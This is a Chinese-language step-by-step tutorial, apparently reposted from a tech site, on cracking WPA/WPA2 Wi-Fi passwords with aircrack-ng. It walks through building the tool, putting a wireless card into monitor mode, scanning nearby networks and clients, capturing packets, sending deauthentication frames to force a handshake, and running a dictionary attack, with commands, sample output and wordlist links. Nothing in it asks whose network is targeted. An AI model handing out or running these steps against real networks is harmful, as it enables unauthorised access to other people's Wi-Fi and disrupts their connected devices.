aircrack-ng 字典破解WPA / WPA2


1. 安裝

首先安裝兩個擴展
sudo apt-get install build-essential
sudo apt-get install libssl-dev

然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 下載最新版的aircrack-ng,解壓它
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3 並把它改為
CFLAGS ?= -g -W -Wall -O3
保存好后,開始編譯安裝
make
sudo make install
完了之后它會提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
於是輸入
sudo airodump-ng-oui-update
更新好后即可。

 

2. 啟動無線網卡監控模式:

wy@wy-Inspiron-7420:~$ sudo airmon-ng start wlan0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID    Name
953    avahi-daemon
954    avahi-daemon
985    NetworkManager
1206    wpa_supplicant
18593    dhclient
Process with PID 18593 (dhclient) is running on interface wlan0


Interface    Chipset        Driver

wlan0        Intel 2230    iwlwifi - [phy0]
                (monitor mode enabled on mon0)

 

3. 掃描無線AP,找到滿意的熱點之后,ctrl+c終止掃描:

上部分為熱點列表,下部分為連接在熱點上的客戶端的列表。

wy@wy-Inspiron-7420:~$ sudo airodump-ng mon0 

CH 11 ][ Elapsed: 8 s ][ 2014-05-18 11:55                                         
                                                                                                                                                                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                         
 08:10:77:AA:XX:82  -88        2        0    0   6  54e  WPA2 CCMP   PSK  Netcore                                                           
 D8:15:0D:21:XX:CA  -84        2        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_211CCA                                                    
 14:E6:E4:93:XX:48  -87        2        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_936048                                                    
 D8:15:0D:1B:XX:A6  -86        2        0    0   6  54e. WPA2 CCMP   PSK  Wiann2061                                                         
 00:36:76:18:XX:28  -50       83       39    2  11  54e. WPA2 CCMP   PSK  kk-link                                                           
 A4:17:31:38:XX:CC  -63        0        0    0  11  54e  WPA2 CCMP   PSK  mayouyou                                                          
 00:87:36:08:XX:2C  -68        5        0    0   6  54e. WPA2 CCMP   PSK  360WiFi-482C                                                      
 CC:34:29:40:XX:16  -127        0      110   22  11  -1   WPA              <length:  0>                                                                                                   
                                                                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                
                                                                                                                                            
 00:36:76:18:XX:28  68:17:29:AF:XX:4C    0    0e- 0e     0       40                                                                         
 CC:34:29:40:XX:16  8C:7B:9D:86:XX:3B   -1    0e- 0      0        4                                                                         
 CC:34:29:40:XX:16  0C:82:68:2A:XX:E3   -1    0e- 0      0       11                                                                         
 CC:34:29:40:XX:16  0C:82:68:2A:XX:F4   -1    0e- 0      0       95                                                                         

wy@wy-Inspiron-7420:~$ 

 

4. 抓包

sudo airodump-ng -c 6 –w longas mon0 
這個窗口不要關。

參數解釋:

-c 這里我們設置目標AP的工作頻道,通過觀察,我們要進行攻擊測試的無線路由器工作頻道為6;

-w 后跟要保存的文件名,這里w就是“write寫”的意思,所以輸入自己希望保持的文件名,這里我就寫為longas。那么,小黑們一定要注意的是:這里我們雖然設置保存的文件名是longas,但是生成的文件卻不是longas.cap,而是longas-01.cap。

 

5.攻擊

sudo aireplay-ng -0 1 –a AP的mac -c 客戶端的mac mon0 

參數解釋:

-0 采用deauth攻擊模式,后面跟上攻擊次數,這里我設置為1,大家可以根據實際情況設置為10不等;

-a 后跟AP的MAC地址;

-c 后跟客戶端的MAC地址;

若第三步的窗口中出現握手包,表示攻擊有效。

 

6. 破解

sudo aircrack-ng -w dic 捕獲的cap文件 

7. 破解完成之后關閉虛擬網卡mon0

wy@wy-Inspiron-7420:~$ sudo airmon-ng stop mon0


Interface    Chipset        Driver

wlan0        Intel 2230    iwlwifi - [phy0]
mon0        Intel 2230    iwlwifi - [phy0] (removed)

 

字典文件下載地址:

http://bbs.ecjtu.org/thread-29817-1-1.html

http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists 

 

詳細步驟查看:http://netsecurity.51cto.com/art/201105/264844_all.htm

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM